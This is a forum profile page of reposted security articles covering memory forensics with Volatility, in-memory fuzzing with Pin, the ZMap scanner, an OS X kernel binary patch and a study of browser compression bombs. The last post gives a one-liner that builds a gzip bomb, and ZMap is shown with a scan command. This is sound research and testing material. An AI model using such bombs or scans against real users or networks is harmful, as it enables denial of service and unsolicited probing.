Everything posted by Nytro

  1. [h=1]Web Framework Vulnerabilities - Abraham Kang[/h] from OWASP AppSec USA

Title: Web Framework Vulnerabilities

Abstract: This talk gives participants an opportunity to practically code-review Web Application Framework based applications for security vulnerabilities. The material covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify them. This talk is a trimmed-down version of the three-hour workshop given at Blackhat. This is an advanced talk, and an understanding of the application frameworks is a prerequisite to get the most out of it.

Speaker: Abraham Kang, Principal Security Researcher, HP Fortify. Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. He currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked in application security for over 10 years, with the most recent four years spent as a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and has presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect.

Date: Friday October 26, 2012, 3:00pm - 3:45pm. Location: AppSecUSA, Austin, TX. Hyatt Regency Hotel. Track: Attack

Source: Web Framework Vulnerabilities - Abraham Kang on Vimeo
  2. [h=1]Visualizing Recovered Executables from Memory Images[/h] jessekornblum (jessekornblum) wrote:

I like to use a picture to help explain how we can recover executables from memory images. For example, here's the image I was using in 2008. This post will explain what's happening in that picture (how PE executables are loaded and recovered) and provide a different visualization of the process. Instead of just a stylized representation, we can produce pictures from actual data. This post explains how to do that and the tools used in the process.

When an executable is loaded from the disk, Windows uses the PE header to determine how many pages, and with which permissions, will be allocated for each section. The header describes the size and location of each section on the disk and its size and location in memory. Because the sections need to be page-aligned in memory, but not on the disk, this generally results in some space being added between the sections when they're loaded into memory. There are also changes made in memory due to relocations and imported functions.

When we recover executables from memory, we can use the PE header to map the sections back to their sizes and locations as they were on the disk. Generally, memory forensics tools don't undo the other modifications made by the Windows loader; the changes made in memory remain in the version we recover. In addition, due to paging and other limitations, we don't always get all of the pages of the executable from memory. They could have been paged out, be invalid, or never have been loaded in the first place.

That's a tidy description of the picture above. The reality, of course, is a little messier. I've used my colorize and filecompare tools to produce visualizations of an executable on the disk, what it looked like in memory, and what it looked like when recovered from the memory image.
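The gaps the loader introduces can be estimated from two PE header fields, FileAlignment (commonly 0x200) and SectionAlignment (commonly 0x1000). Here is a minimal sketch of the rounding involved; the field names follow the PE specification, while the section size is a made-up example:

```python
def align_up(size, alignment):
    """Round size up to the next multiple of alignment."""
    return (size + alignment - 1) // alignment * alignment

# Hypothetical .text section: raw data size as stored in the header.
raw_size = 0x4A00

on_disk   = align_up(raw_size, 0x200)   # FileAlignment: size on disk
in_memory = align_up(raw_size, 0x1000)  # SectionAlignment: size once mapped

slack = in_memory - on_disk  # padding the loader adds between sections
```

Tools like procexedump effectively invert this mapping, using the header to place each section back at its file-aligned offset.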
In addition to those tools, I used the Volatility™ memory forensics framework [1] and the Picasion tool for making animated GIFs [2]. For the memory image, I'm using the xp-laptop memory image from the NIST CFReDS project [3]. In particular, we'll be looking at cmd.exe, process 3256.

Here's a representation of the original executable from the disk as produced with colorize. This image is a little different from some of the others I've posted before. Instead of being vertically oriented, it's horizontal: the data starts at the top left, goes down, and then right. I've also changed the images to be 512 pixels wide instead of the default 100. I made the image this way to make it appear similar to the image at the start of this post. Here's the command I used to generate the picture:

$ colorize -o -w 512 cmd.exe

and here's the result: http://jessekornblum.com/tools/colorize/img/cmd.exe.bmp

It gets interesting when we compare this picture to the data we can recover from the memory image. First, we can recover the in-memory representation of the executable using the Volatility™ plugin procmemdump. In the files generated by this plugin the pages are memory-aligned, not disk-aligned. Here's the command line to run the plugin:

$ python vol.py -f cases/xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procmemdump --pid=3256 --dump-dir=output
Volatile Systems Volatility Framework 2.3_alpha
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x8153f480 0x4ad00000 cmd.exe              OK: executable.3256.exe

Here's how we can colorize it:

$ mv executable.3256.exe executable-procmemdump.3256.exe
$ colorize -o -w 512 executable-procmemdump.3256.exe

Which leads to this result: http://jessekornblum.com/tools/colorize/img/executable-procmemdump.3256.exe.bmp

There's a lot going on here, but things will become clearer with a third image.
For the third picture we'll recover the executable again, but this time realigning the sections back to how they were on the disk. This is done by parsing the PE header in memory and using it to undo some of the changes made when the executable was loaded. We can do this using the procexedump plugin, like this:

$ python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procexedump --pid=3256 --dump-dir=output
Volatile Systems Volatility Framework 2.3_alpha
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x8153f480 0x4ad00000 cmd.exe              OK: executable.3256.exe

We repeat the process for colorizing this sample:

$ mv executable.3256.exe executable-procexedump.3256.exe
$ colorize -o -w 512 executable-procexedump.3256.exe

Which produces this image: http://jessekornblum.com/tools/colorize/img/executable-procexedump.3256.exe.bmp

First, let's compare the recovered executable back to the original. Even before we start our visualizations, we can see there were changes between the original and this version. The MD5 hashes of the two files are different:

$ md5deep -b cmd.exe executable-procexedump.3256.exe
eeb024f2c81f0d55936fb825d21a91d6  cmd.exe
ff8a9a332a9471e1bf8d5cebb941fc66  executable-procexedump.3256.exe

Amazingly, however, they match using fuzzy hashing via the ssdeep tool [4]:

$ ssdeep -bda cmd.exe executable-procexedump.3256.exe
executable-procexedump.3256.exe matches cmd.exe (66)

There's also a match with the sdhash similarity detection tool [5]:

$ sdhash -g -t 0 cmd.exe executable-procexedump.3256.exe
cmd.exe|executable-procexedump.3256.exe|046

(You haven't heard of sdhash? Don't get tunnel vision! There are many similarity detection tools.)

Those matches are good signs. But attempting to compare the colorized image of the recovered executable back to the original is a little tricky. To make it easier, I made a kind of blink comparator. The free site Picasion allows you to make animated GIFs from submitted pictures.
Combined with some annotations on the pictures, here's the result: There are two important things to notice here. First, we didn't recover all of the executable. The bands of black which appear on the left-hand side in the recovered image are pages which weren't found in memory. Also notice how much of the data from the end of the file is missing, too. Almost all of it! (Isn't it amazing that fuzzy hashing can still generate a match between these two files?)

The second thing to notice is the changes in the data. It's a little hard to see in the GIF, but you can get a better view using the filecompare and colorize tools together. We can compare the two files at the byte level and then colorize the result:

$ filecompare -b 1 cmd.exe executable-procexedump.3256.exe > orig-to-exe.dat
$ colorize -o -w 512 orig-to-exe.dat

Here's the result: http://jessekornblum.com/tools/colorize/img/orig-to-exe.dat.bmp

Here we can clearly see, in red, the changes throughout the file. The blocks of mostly red, or heavily speckled red, are the places where we weren't able to recover data from the memory image. Because some of the values in the original executable were zeros, those appear to match the zeros we recovered from the memory image, hence the speckled pattern. In the changes to the executable you can clearly see a pattern of dashed red lines.

Finally, we can visualize the changes between the in-memory representation of the file and the disk representation of the file. I've made another animated GIF, this time between these versions of the executable as recovered by procexedump and procmemdump: The most obvious difference between these two pictures is the black band on the left-hand side of the image. That's the space, created by the realignment from disk to memory, added by the Windows loader to page-align the first section of the executable.

[h=3]References[/h]
[1] The Volatility™ framework, https://code.google.com/p/volatility/. Volatility™ is a trademark of Verizon.
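The byte-level comparison that filecompare performs can be approximated in a few lines. This is a hypothetical stand-in, not Kornblum's actual tool: it emits one byte per compared block, 0 for a match and 1 for a difference, which is exactly the kind of data colorize can then render as a speckle map:

```python
def filecompare(a: bytes, b: bytes, block: int = 1) -> bytes:
    """Compare two byte strings block by block.

    Returns one output byte per block: 0 if the blocks are identical,
    1 if they differ (including when one input is shorter).
    """
    n = max(len(a), len(b))
    out = bytearray()
    for off in range(0, n, block):
        out.append(0 if a[off:off + block] == b[off:off + block] else 1)
    return bytes(out)
```

With block=1 this matches the `-b 1` invocation above: identical bytes map to zero (black) and changed or unrecovered bytes map to one (red).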
Jesse Kornblum is not sponsored or approved by, or affiliated with, Verizon.
[2] Picasion.com, Picasion GIF maker - Create GIF animations online - Make an Animated GIF.
[3] The Computer Forensic Reference Data Sets project, National Institute of Standards and Technology, The CFReDS Project.
[4] Jesse Kornblum, ssdeep, Fuzzy Hashing and ssdeep.
[5] Vassil Roussev, sdhash, http://sdhash.org/.

Source: jessekornblum: Visualizing Recovered Executables from Memory Images
  3. In-Memory fuzzing with Pin, by Jonathan Salwan - 2013-08-17

In my previous blog post, I talked about taint analysis and pattern matching with Pin. In this short post, I will again talk about Pin, but this time about in-memory fuzzing.

1 - In-Memory fuzzing

1.1 - Little introduction

In-memory fuzzing is a technique which consists of targeting and testing a specific basic block, function or portion of a program. To be honest, this technique is not really satisfactory over a large portion of code; it is mainly used for quick analysis. However, it's really straightforward to implement. For that, we just need to:

1. Choose a targeted piece of code.
2. Set a breakpoint before and after our targeted area.
3. Save the execution context when the first breakpoint occurs.
4. Restore the execution context when the second breakpoint occurs.
5. Catch the SIGSEGV signal.
6. Repeat steps 3 and 4 until a crash occurs.

1.2 - Little example

For a little example, see the following graph. Now, imagine that the user can control the first argument; that means he can control the rdi register in the first basic block and [rbp+var_4] in this stack frame. In this case, we are interested in testing the orange basic block. As you can see below, in the orange basic block we have a "mov eax, [rbp+var_4]", which means we can control the eax register. So, we will apply the in-memory fuzzing technique in this basic block between the "cdqe" and "mov eax, 0" instructions, and we will fuzz the eax register.

Use the Pin API

The Pin API provides everything we need to apply the in-memory fuzzing technique. To catch signals, we use the PIN_InterceptSignal() function. This function takes the type of signal and a callback. So, to catch the SIGSEGV signal, in our main function we have something like this:

PIN_InterceptSignal(SIGSEGV, catchSignal, 0);

Our callback, catchSignal, just displays the current context when the signal occurs.
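The steps above amount to a snapshot-and-restore loop around the target. Outside of Pin, the same control flow can be sketched in plain Python, with a function standing in for the targeted basic block and an exception standing in for SIGSEGV; every name here is illustrative, none of it is the Pin API:

```python
def fuzz_in_memory(target, start_value=1, max_value=0x3000):
    """Run `target` repeatedly with an incrementing register value,
    rebuilding the saved context between runs, until it faults."""
    for value in range(start_value, max_value):
        context = {"eax": value}      # step 3: save a fresh context
        try:
            target(context)           # execute the targeted area
        except MemoryError:           # step 5: stand-in for SIGSEGV
            return value              # report the crashing input
        # step 4: implicit restore, the context is discarded and rebuilt
    return None

# Toy target: faults once eax indexes past a 0x2000-byte buffer,
# mimicking the out-of-bounds "movzx eax, byte ptr [rax]" read.
def target(ctx):
    if ctx["eax"] >= 0x2000:
        raise MemoryError("simulated SIGSEGV")

crash = fuzz_in_memory(target)  # first value that faults
```

The real Pin tool does the same loop at instruction granularity, with hardware register state instead of a dictionary.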
Then, because Pin is a DBI (Dynamic Binary Instrumentation) framework, we can't set a breakpoint, but that's not really important: with a DBI framework we can control each instruction before and after its execution. So, we will use the PIN_SaveContext() and PIN_ExecuteAt() functions when the first and last targeted instructions occur. A CONTEXT in Pin is just the register state of the processor. That means, when you call PIN_SaveContext(), you save only the state of the registers, not the memory. So, to monitor STORE accesses, we use the INS_MemoryOperandIsWritten() function. When a STORE occurs, we save the original value, and we restore it when the context is restored. That's all; you can see the full source code here.

In-Memory fuzzing Pin tool

This Pin tool requires three arguments and can take three optional arguments.

Required
--------
-start <address>   The start address of the fuzzing area
-end <address>     The end address of the fuzzing area
-reg <register>    The register which will be fuzzed

Optional
--------
-startValue <value>              The start value
-maxValue <value>                The end value
-fuzzingType <"inc" | "random">  Type of fuzzing: incremental or random

If we take the above example and want to fuzz the orange basic block, we have something like this:

$ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax -fuzzingType inc \
       -startValue 1 -maxValue 0x3000 -- ./test 1 > dump
[2]    8472 segmentation fault
0.53s user 0.20s system 99% cpu 0.729 total

I used the "time" command to show you how efficient Pin is. I've also redirected stdout to a file called 'dump' because of the output log size (5.5M). At the end of this dump, you can see the context when the SIGSEGV occurs: RIP = 0x4005a5, "movzx eax, byte ptr [rax]", with RAX = 0x2420.
[Restore Context]
[Save Context]
[CONTEXT]=----------------------------------------------------------
RAX = 0000000000002420  RBX = 0000000000000000
RCX = 00007fff3134c168  RDX = 00007fff3134abe0
RDI = 0000000000000001  RSI = 00007fff3134abe0
RBP = 00007fff3134abc0  RSP = 00007fff3134abb0
RIP = 00000000004005a5
+-------------------------------------------------------------------
+--> 4005a5: cdqe
+--> 4005a7: add rax, qword ptr [rbp-0x10]
+--> 4005ab: movzx eax, byte ptr [rax]

/!\ SIGSEGV received /!\
[SIGSGV]=----------------------------------------------------------
RAX = 00007fff3134d000  RBX = 0000000000000000
RCX = 00007fff3134c168  RDX = 00007fff3134abe0
RDI = 0000000000000001  RSI = 00007fff3134abe0
RBP = 00007fff3134abc0  RSP = 00007fff3134abb0
RIP = 00000000004005ab
+-------------------------------------------------------------------

You can download this Pin tool here.

Source: shell-storm | In-Memory fuzzing with Pin
  4. ZMap: The Internet Scanner v1.0.3 released

ZMap is an open-source network scanner that enables researchers to easily perform Internet-wide network studies. With a single machine and a well-provisioned network uplink, ZMap is capable of performing a complete scan of the IPv4 address space in under 45 minutes, approaching the theoretical limit of gigabit Ethernet. ZMap can be used to study protocol adoption over time, monitor service availability, and help us better understand large systems distributed across the Internet.

ZMap is designed to perform comprehensive scans of the IPv4 address space or large portions of it. While ZMap is a powerful tool for researchers, please keep in mind that by running ZMap, you are potentially scanning the ENTIRE IPv4 address space at over 1.4 million packets per second. Before performing even small scans, we encourage users to contact their local network administrators and consult our list of scanning best practices.

By default, ZMap will perform a TCP SYN scan on the specified port at the maximum rate possible. A more conservative configuration that will scan 10,000 random addresses on port 80 at a maximum of 10 Mbps can be run as follows:

$ zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.txt

Download: https://zmap.io/download.html
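The 45-minute figure is easy to sanity-check: at roughly 1.4 million packets per second, sweeping all 2^32 IPv4 addresses takes on the order of 51 minutes, and somewhat less once reserved and unroutable ranges are skipped. The numbers below are back-of-the-envelope, not ZMap's exact accounting, and the 14% reserved-space figure is a rough assumption:

```python
PPS = 1_400_000          # approximate SYN packets/second at gigabit line rate
FULL_SPACE = 2 ** 32     # every IPv4 address

seconds = FULL_SPACE / PPS
minutes = seconds / 60   # roughly 51 minutes for the raw address space

# Assumption: excluding reserved/multicast/private space (~14% of
# addresses) brings the sweep near the quoted under-45-minute mark.
routable_minutes = minutes * 0.86
```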
  5. Hacking the OS X Kernel for Fun and Profiles

Posted on Tuesday, August 13, 2013.

My last post described how user-level CPU profilers work, and specifically how Google's pprof profiler gathers its CPU profiles with the help of the operating system. The specific feature needed from the operating system is the profiling timer provided by setitimer(2) and the SIGPROF signals that it delivers. If the operating system's implementation of that feature doesn't work, then the profiler doesn't work. This post looks at a common bug in Unix implementations of profiling signals and the fix for OS X, applied by editing the OS X kernel binary. If you haven't read "How to Build a User-Level CPU Profiler," you might want to start there.

Unix and Signals and Threads

My earlier post referred to profiling programs, without mention of processes or threads. Unix in general and SIGPROF in particular predate the idea of threads. SIGPROF originated in the 4.2BSD release of Berkeley Unix, published in 1983. In Unix at the time, a process was a single thread of execution. Threads did not come easily to Unix. Early implementations were slow and buggy and best avoided. Each of the popular Unix variants added thread support independently, with many shared mistakes.

Even before we get to implementation, many of the original Unix APIs are incompatible with the idea of threads. Multithreaded processes allow multiple threads of execution in a single process address space. Unix maintains much per-process state, and the kernel authors must decide whether each piece of state should remain per-process or change to be per-thread. For example, the single process stack must be split into per-thread stacks: it is impossible for independently executing threads to be running on a single stack. Because there are many threads, thread stacks tend to be smaller than the one big process stack that non-threaded Unix programs had.
As a result, it can be important to define a separate stack for running signal handlers. That setting is per-thread, for the same reason that ordinary stacks are per-thread. But the choice of handler is per-process.

File descriptors are per-process, but then one thread might open a file moments before another thread forks and execs a new program. In order for the open file not to be inherited by the new program, we must introduce a new variant of open(2) that can open a file descriptor atomically marked "close on exec." And not just open: every system call that creates a new file descriptor needs a variant that creates the file descriptor "close on exec."

Memory is per-process, so malloc must use a lock to serialize access by independent threads. But again, one thread might acquire the malloc lock moments before another thread forks and execs a new program. The fork makes a new copy of the current process memory, including the locked malloc lock, and that copy will never see the unlock by the thread in the original program. So the child of fork can no longer use malloc without occasional deadlocks. That's just the tip of the iceberg. There are a lot of changes to make, and it's easy to miss one.

Profiling Signals

Here's a thread-related change that is easy to miss. The goal of the profiling signal is to enable user-level profiling. The signal is sent in response to a program using up a certain amount of CPU time. More specifically, in a multithreaded kernel, the profiling signal is sent when the hardware timer interrupts a thread and the timer interrupt handler finds that the execution of that thread has caused the thread's process's profiling timer to expire. In order to profile the code whose execution triggered the timer, the profiling signal must be sent to the thread that is running.
If the signal is sent to a thread that is not running, the profile will record idleness such as being blocked on I/O or sleeping as execution, and will be neither accurate nor useful. Modern Unix kernels support sending a signal to a process, in which case it can be delivered to an arbitrary thread, or to a specific thread. kill(2) sends a signal to a process, and pthread_kill(2) sends a signal to a specific thread within a process. Before Unix had threads, the code that delivered a profiling signal looked like psignal(p, SIGPROF), where psignal is a clearer name for the implementation of the kill(2) system call and p is the process with the timer that just expired. If there is just one thread per process, delivering the signal to the process cannot possibly deliver it to the wrong thread. In multithreaded programs, the SIGPROF must be delivered to the running thread: the kernel must call the internal equivalent of pthread_kill(2), not kill(2). FreeBSD and Linux deliver profiling signals correctly. Empirically, NetBSD, OpenBSD, and OS X do not. (Here is a simple C test program.) Without correct delivery of profiling signals, it is impossible to build a correct profiler.

OS X Signal Delivery

To Apple's credit, the OS X kernel sources are published and open source, so we can look more closely at the buggy OS X implementation. The profiling signals are delivered by the function bsd_ast in the file kern_sig.c. Here is the relevant bit of code:

void
bsd_ast(thread_t thread)
{
    proc_t p = current_proc();
    ...
    if (timerisset(&p->p_vtimer_prof.it_value)) {
        uint32_t microsecs;
        task_vtimer_update(p->task, TASK_VTIMER_PROF, &microsecs);
        if (!itimerdecr(p, &p->p_vtimer_prof, microsecs)) {
            if (timerisset(&p->p_vtimer_prof.it_value))
                task_vtimer_set(p->task, TASK_VTIMER_PROF);
            else
                task_vtimer_clear(p->task, TASK_VTIMER_PROF);
            psignal(p, SIGPROF);
        }
    }
    ...
}

The bsd_ast function is the BSD half of the OS X timer interrupt handler.
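The CPU-time (rather than wall-clock) nature of the profiling timer is easy to observe from user space. This sketch uses Python's signal module, which wraps setitimer(2); it is single-threaded, so it only demonstrates that SIGPROF fires as CPU time is consumed, not the multithreaded delivery bug itself:

```python
import signal
import time

fired = []
signal.signal(signal.SIGPROF, lambda signum, frame: fired.append(signum))

# Arm the profiling timer: it expires after 50 ms of *CPU* time.
signal.setitimer(signal.ITIMER_PROF, 0.05)

# Sleeping consumes almost no CPU time, so the timer barely advances...
time.sleep(0.2)
slept_fired = bool(fired)

# ...but spinning burns CPU time, so SIGPROF arrives quickly.
deadline = time.monotonic() + 5.0
while not fired and time.monotonic() < deadline:
    sum(range(1000))

signal.setitimer(signal.ITIMER_PROF, 0)  # disarm the timer
```

The C test program linked above performs the multithreaded version of this check, verifying which thread actually receives the signal.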
If profiling is enabled, bsd_ast decrements the timer and sends the signal if the timer expires. The innermost if statement is resetting the timer state, because setitimer(2) allows both one-shot and periodic timers. As predicted, the code is sending the profiling signal to the process, not to the current thread. There is a function psignal_uthread defined in the same source file that sends a signal to a specific thread instead. One possible fix is very simple: change psignal to psignal_uthread. I filed a report about this bug as Apple Bug Report #9177434 in March 2011, but the bug has persisted in subsequent releases of OS X. In my report, I suggested a different fix, inside the implementation of psignal, but changing psignal to psignal_uthread is even simpler. Let's do that.

Patching the Kernel

It should be possible to rebuild the OS X kernel from the released sources. However, I do not know whether the sources are complete, and I do not know what configuration I need to use to recreate the kernel on my machine. I have no confidence that I'd end up with a kernel appropriate for my computer. Since the fix is so simple, it should be possible to just modify the standard OS X kernel binary directly. That binary lives in /mach_kernel on OS X computers. If we run gdb on /mach_kernel we can see the compiled machine code for bsd_ast and find the section we care about.
$ gdb /mach_kernel
(gdb) disas bsd_ast
Dump of assembler code for function bsd_ast:
0xffffff8000568a50 <bsd_ast+0>:   push   %rbp
0xffffff8000568a51 <bsd_ast+1>:   mov    %rsp,%rbp
...
if (timerisset(&p->p_vtimer_prof.it_value))
0xffffff8000568b7b <bsd_ast+299>: cmpq   $0x0,0x1e0(%r15)
0xffffff8000568b83 <bsd_ast+307>: jne    0xffffff8000568b8f <bsd_ast+319>
0xffffff8000568b85 <bsd_ast+309>: cmpl   $0x0,0x1e8(%r15)
0xffffff8000568b8d <bsd_ast+317>: je     0xffffff8000568b9f <bsd_ast+335>
task_vtimer_set(p->task, TASK_VTIMER_PROF);
0xffffff8000568b8f <bsd_ast+319>: mov    0x18(%r15),%rdi
0xffffff8000568b93 <bsd_ast+323>: mov    $0x2,%esi
0xffffff8000568b98 <bsd_ast+328>: callq  0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp    0xffffff8000568bad <bsd_ast+349>
task_vtimer_clear(p->task, TASK_VTIMER_PROF);
0xffffff8000568b9f <bsd_ast+335>: mov    0x18(%r15),%rdi
0xffffff8000568ba3 <bsd_ast+339>: mov    $0x2,%esi
0xffffff8000568ba8 <bsd_ast+344>: callq  0xffffff8000237660 <task_vtimer_clear>
psignal(p, SIGPROF);
0xffffff8000568bad <bsd_ast+349>: mov    %r15,%rdi
0xffffff8000568bb0 <bsd_ast+352>: xor    %esi,%esi
0xffffff8000568bb2 <bsd_ast+354>: xor    %edx,%edx
0xffffff8000568bb4 <bsd_ast+356>: xor    %ecx,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov    $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq  0xffffff8000567340 <threadsignal+224>
...

I've annotated the assembly with the corresponding C code. The final sequence is odd. It should be a call to psignal but instead it is a call to code 224 bytes beyond the start of the threadsignal function. What's going on is that psignal is a thin wrapper around psignal_internal, and that wrapper has been inlined. Since psignal_internal is a static function, it does not appear in the kernel symbol table, and so gdb doesn't know its name.
The definitions of psignal and psignal_uthread are:

void
psignal(proc_t p, int signum)
{
    psignal_internal(p, NULL, NULL, 0, signum);
}

static void
psignal_uthread(thread_t thread, int signum)
{
    psignal_internal(PROC_NULL, TASK_NULL, thread, PSIG_THREAD, signum);
}

With the constants expanded, the call we're seeing is psignal_internal(p, 0, 0, 0, 0x1b), and the call we want to turn it into is psignal_internal(0, 0, thread, 4, 0x1b). All we need to do is prepare the different argument list. Unfortunately, the thread variable was passed to bsd_ast in a register, and since it is no longer needed at this point in the function, the register has been reused for other purposes: thread is gone. Fortunately, bsd_ast's one and only invocation in the kernel is bsd_ast(current_thread()), so we can reconstruct the value by calling current_thread ourselves. Unfortunately, there is no room in the 15 bytes from bsd_ast+349 to bsd_ast+364 to insert such a call and still prepare the other arguments. Fortunately, we can optimize a bit of the preceding code to make room. Notice that the calls to task_vtimer_set and task_vtimer_clear are passing the same argument list, and that argument list is prepared on both sides of the conditional:

...
if (timerisset(&p->p_vtimer_prof.it_value))
0xffffff8000568b7b <bsd_ast+299>: cmpq   $0x0,0x1e0(%r15)
0xffffff8000568b83 <bsd_ast+307>: jne    0xffffff8000568b8f <bsd_ast+319>
0xffffff8000568b85 <bsd_ast+309>: cmpl   $0x0,0x1e8(%r15)
0xffffff8000568b8d <bsd_ast+317>: je     0xffffff8000568b9f <bsd_ast+335>
task_vtimer_set(p->task, TASK_VTIMER_PROF);
0xffffff8000568b8f <bsd_ast+319>: mov    0x18(%r15),%rdi
0xffffff8000568b93 <bsd_ast+323>: mov    $0x2,%esi
0xffffff8000568b98 <bsd_ast+328>: callq  0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp    0xffffff8000568bad <bsd_ast+349>
task_vtimer_clear(p->task, TASK_VTIMER_PROF);
0xffffff8000568b9f <bsd_ast+335>: mov    0x18(%r15),%rdi
0xffffff8000568ba3 <bsd_ast+339>: mov    $0x2,%esi
0xffffff8000568ba8 <bsd_ast+344>: callq  0xffffff8000237660 <task_vtimer_clear>
psignal(p, SIGPROF);
0xffffff8000568bad <bsd_ast+349>: mov    %r15,%rdi
0xffffff8000568bb0 <bsd_ast+352>: xor    %esi,%esi
0xffffff8000568bb2 <bsd_ast+354>: xor    %edx,%edx
0xffffff8000568bb4 <bsd_ast+356>: xor    %ecx,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov    $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq  0xffffff8000567340 <threadsignal+224>
...

We can pull that call setup above the conditional, eliminating one copy and giving ourselves nine bytes to use for delivering the signal. A call to current_thread would take five bytes, and then moving the result into an appropriate register would take two more, so nine is plenty. In fact, since we have nine bytes, we can inline the body of current_thread (a single nine-byte mov instruction) and change it to store the result to the correct register directly. That avoids needing to prepare a position-dependent call instruction. The final version is:

...
0xffffff8000568b7b <bsd_ast+299>: mov    0x18(%r15),%rdi
0xffffff8000568b7f <bsd_ast+303>: mov    $0x2,%esi
0xffffff8000568b84 <bsd_ast+308>: cmpq   $0x0,0x1e0(%r15)
0xffffff8000568b8c <bsd_ast+316>: jne    0xffffff8000568b98 <bsd_ast+328>
0xffffff8000568b8e <bsd_ast+318>: cmpl   $0x0,0x1e8(%r15)
0xffffff8000568b96 <bsd_ast+326>: je     0xffffff8000568b9f <bsd_ast+335>
0xffffff8000568b98 <bsd_ast+328>: callq  0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp    0xffffff8000568ba4 <bsd_ast+340>
0xffffff8000568b9f <bsd_ast+335>: callq  0xffffff8000237660 <task_vtimer_clear>
0xffffff8000568ba4 <bsd_ast+340>: xor    %edi,%edi
0xffffff8000568ba6 <bsd_ast+342>: xor    %esi,%esi
0xffffff8000568ba8 <bsd_ast+344>: mov    %gs:0x8,%rdx
0xffffff8000568bb1 <bsd_ast+353>: mov    $0x4,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov    $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq  0xffffff8000567340 <threadsignal+224>
...

If we hadn't found the duplicate call setup to factor out, another possible approach would have been to factor the two very similar code blocks handling SIGVTALRM and SIGPROF into a single subroutine, sitting in the middle of the bsd_ast function code, and to call it twice. Removing the second copy of the code would leave plenty of space for the longer psignal_uthread call setup. The code we've been using is from OS X Mountain Lion, but all versions of OS X have this bug, and the relevant bits of bsd_ast haven't changed from version to version, although the compiler, and therefore the generated code, do change. Even so, all have the basic pattern and all can be fixed with the same kind of rewrite.

Using the Patch

If you use Go or the C++ gperftools and want accurate CPU profiles on OS X, I've packaged up the binary patcher as code.google.com/p/rsc/cmd/pprof_mac_fix. It can handle OS X Snow Leopard, Lion, and Mountain Lion. Will OS X Mavericks need a fix too? We'll see.

Further Reading

Binary patching is an old, venerable technique. This is just a simple instance of it.
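At its core, a binary patcher like this finds one unique byte sequence in the kernel image and overwrites it in place with a same-length replacement. A generic, hypothetical sketch of that step follows; the function name and the example bytes are illustrative, not the real kernel code or the pprof_mac_fix implementation:

```python
def patch_binary(data: bytes, old: bytes, new: bytes) -> bytes:
    """Replace exactly one occurrence of `old` with `new` (same length).

    Refusing to patch unless the match is unique and the sizes agree
    is what keeps a blind binary patch from corrupting the file.
    """
    if len(old) != len(new):
        raise ValueError("patch must not change the file size")
    count = data.count(old)
    if count != 1:
        raise ValueError(f"expected exactly one match, found {count}")
    i = data.index(old)
    return data[:i] + new + data[i + len(old):]

# Toy example: rewrite a 5-byte sequence in a fake "kernel image".
image   = b"\x90\x90\x48\x89\xff\x31\xf6\x90"
patched = patch_binary(image, b"\x48\x89\xff\x31\xf6",
                              b"\x31\xff\x31\xf6\x90")
```

The same-length constraint mirrors the real situation above: the rewritten bsd_ast sequence had to fit exactly in the bytes freed by removing the duplicate call setup.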
If you liked reading about this, you may also like to read Jeff Arnold's paper "Ksplice: Automatic Rebootless Kernel Updates." Ksplice can construct binary patches for Linux security vulnerabilities and apply them on the fly to a running system.

Source: research!rsc: Hacking the OS X Kernel for Fun and Profiles
  6. Vulnerabilities that just won't die - Compression Bombs

Recently Cyberis has reviewed a number of next-generation firewalls and content inspection devices. A subset of the test cases we developed related to compression bombs, specifically delivered over HTTP. The research prompted us to take another look at how modern browsers handle such content, given that the vulnerability (or perhaps more accurately, 'common weakness': CWE-409, Improper Handling of Highly Compressed Data (Data Amplification)) has been reported and well known for over ten years. The results surprised us. In short, the majority of web browsers are still vulnerable to compression bombs leading to various denial-of-service conditions, including, in some cases, full exhaustion of all available disk space with no user input.

Introduction to HTTP Compression

HTTP compression is a capability widely supported by web browsers and other HTTP User-Agents, allowing bandwidth and transmission speeds to be maximised between client and server. Supporting clients will advertise supported compression schemes, and if a mutually supported scheme can be negotiated, the server will respond with a compressed HTTP response. Compatible User-Agents will typically decompress encoded data on the fly. HTML content, images and other files transmitted are usually handled in memory (allowing pages to be rendered as quickly as possible), whilst larger file downloads will usually be decompressed straight to disk to prevent unnecessary consumption of memory resources on the client. Gzip (RFC 1952) is considered the most widely supported compression scheme in use today, although the common weaknesses discussed in this post are applicable to all schemes in use today.

What is a Compression Bomb?

Quite simply, a compression bomb is compressed content that extracts to a size much larger than the developer expected; in other words, incorrect handling of highly compressed data.
This can result in various denial-of-service conditions, for example memory, CPU and free disk space exhaustion. Using an entropy rate of zero (for example, /dev/zero), coupled with the multiple rounds of encoding that modern browsers support (see our ResponseCoder post), a 43 Kilobyte HTTP server response will equate to a 1 Terabyte file when decompressed by a receiving client - an effective compression ratio of 25,127,100:1.

It is trivial to make a gzip bomb on the Linux command line - see below for an example of a 10MB file being compressed to just 159 bytes using two rounds of gzip compression:

$ dd if=/dev/zero bs=10M count=1 | gzip -9 | gzip -9 | wc -c
1+0 records in
1+0 records out
10485760 bytes (10 MB) copied, 0.149518 s, 70.1 MB/s
159

Testing Framework

